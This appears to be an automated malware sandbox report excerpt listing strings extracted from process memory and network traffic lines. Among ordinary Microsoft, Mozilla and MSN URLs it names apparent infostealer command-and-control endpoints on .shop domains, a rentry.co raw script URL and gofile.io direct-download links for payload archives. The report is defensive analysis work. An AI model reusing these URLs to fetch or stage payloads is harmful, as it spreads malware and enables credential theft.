Source: BitLockerToGo.exe, 0000000D.00000003.2705841267.0000000003016000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000002.2710036520.0000000003016000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apill
Source: BitLockerToGo.exe, 0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop/apincod
Source: BitLockerToGo.exe, 0000000D.00000003.2631526881.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2632557485.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://callosallsaospz.shop:443/api
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2FAC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: lm.exe, 00000013.00000002.3175149094.0000000003100000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950433978.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000002.3175149094.000000000310B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/
Source: lm.exe, 00000013.00000002.3175149094.0000000003100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/-
Source: lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/0
Source: lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/N
Source: lm.exe, 00000013.00000002.3175149094.0000000003100000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/S
Source: lm.exe, 00000013.00000003.2832025974.0000000000613000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2830110398.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950711988.0000000003112000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000002.3175149094.0000000003113000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/api
Source: lm.exe, 00000013.00000002.3181333453.0000000003340000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apiH7%
Source: lm.exe, 00000013.00000003.2951586397.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000002.3159798781.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950433978.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apiN
Source: lm.exe, 00000013.00000002.3159798781.00000000005E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apihop
Source: lm.exe, 00000013.00000003.2951586397.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000002.3159798781.0000000000610000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2950433978.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apii
Source: lm.exe, 00000013.00000002.3175149094.0000000003113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apitg
Source: lm.exe, 00000013.00000002.3175149094.0000000003113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/apiyi
Source: lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop/q
Source: lm.exe, 00000013.00000002.3175149094.0000000003122000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://liernessfornicsa.shop:443/api
Source: powershell.exe, 0000000E.00000002.2777085480.000002EC3E13C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: BD9E.exe, 0000000A.00000002.2843609071.000001DCCE409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co
Source: BD9E.exe, 0000000A.00000002.2843609071.000001DCCE409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/mi
Source: BD9E.exe, 0000000A.00000002.2916663972.000001DCE9816000.00000004.00000020.00020000.00000000.sdmp, BD9E.exe, 0000000A.00000002.2843609071.000001DCCE388000.00000004.00000800.00020000.00000000.sdmp, BD9E.exe, 0000000A.00000002.2843609071.000001DCCE409000.00000004.00000800.00020000.00000000.sdmp, BD9E.exe, 0000000A.00000002.2843609071.000001DCCE2D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rentry.co/microgods/raw
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2F78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store4.gofile.io
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2F78B000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.10.dr	String found in binary or memory: https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip
Source: powershell.exe, 0000000E.00000002.2733250356.000002EC2E2F7000.00000004.00000800.00020000.00000000.sdmp, rentry-script.ps1.10.dr	String found in binary or memory: https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip
Source: BitLockerToGo.exe, 0000000D.00000003.2616014173.0000000004F9E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2737079544.0000000003346000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 0000000D.00000003.2616014173.0000000004F9C000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2739860037.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2741746788.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2737079544.0000000003346000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: lm.exe, 00000013.00000003.2737691156.000000000314F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: BitLockerToGo.exe, 0000000D.00000003.2616014173.0000000004F9C000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2739860037.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2741746788.0000000003173000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2737079544.0000000003346000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: lm.exe, 00000013.00000003.2737691156.000000000314F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1716518107.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: BitLockerToGo.exe, 0000000D.00000003.2646800231.0000000005065000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 0000000D.00000003.2646800231.0000000005065000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2789712158.0000000003568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1712692265.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: BD9E.exe.1.dr	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50736
Source: unknown	Network traffic detected: HTTP traffic on port 50806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50738
Source: unknown	Network traffic detected: HTTP traffic on port 50749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50730
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50743
Source: unknown	Network traffic detected: HTTP traffic on port 50801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50741
Source: unknown	Network traffic detected: HTTP traffic on port 50761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50754
Source: unknown	Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50758
Source: unknown	Network traffic detected: HTTP traffic on port 50789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50752
Source: unknown	Network traffic detected: HTTP traffic on port 50762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50768
Source: unknown	Network traffic detected: HTTP traffic on port 50824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50760
Source: unknown	Network traffic detected: HTTP traffic on port 50784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50763
Source: unknown	Network traffic detected: HTTP traffic on port 50807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50810
Source: unknown	Network traffic detected: HTTP traffic on port 50825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50816
Source: unknown	Network traffic detected: HTTP traffic on port 50831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50819
Source: unknown	Network traffic detected: HTTP traffic on port 50754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50826
Source: unknown	Network traffic detected: HTTP traffic on port 50748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50828
Source: unknown	Network traffic detected: HTTP traffic on port 50759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50709
Source: unknown	Network traffic detected: HTTP traffic on port 50743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50830
Source: unknown	Network traffic detected: HTTP traffic on port 50704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50695 -> 443
